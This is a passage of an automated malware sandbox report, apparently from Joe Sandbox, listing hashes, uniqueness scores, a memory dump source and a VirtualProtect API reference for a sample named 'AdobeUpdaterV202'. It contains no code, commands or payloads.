                                                                                                                                              • Instruction ID: 95687089acbfbb44161efc2ca266262d1887992f7b78fd91db567f6b8b5fd16a
                                                                                                                                              • Opcode Fuzzy Hash: 06c7d39843a6cb5cbbcdf7305366ff435204e113f3c76fb8bbaa1dc330002df6
                                                                                                                                              • Instruction Fuzzy Hash: C93113B1A00249DFCF10CF99D984ADEBBF4FB48310F10842AE958A7350D375A950CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(04353584,?,?,?), ref: 01590FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2055087637.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_1590000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 8f41137edadbc733861e05b751ba46a464ca95672d8b874cf610dca64a071345
                                                                                                                                              • Instruction ID: 02fc4981f22be5d394722206cd27487a514b3d924fe4c58e17ea39eb7716ff21
                                                                                                                                              • Opcode Fuzzy Hash: 8f41137edadbc733861e05b751ba46a464ca95672d8b874cf610dca64a071345
                                                                                                                                              • Instruction Fuzzy Hash: C921E8B59012199FCB00DF99C885BDEFBF8FB09320F10852AE958A7250D374A954CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%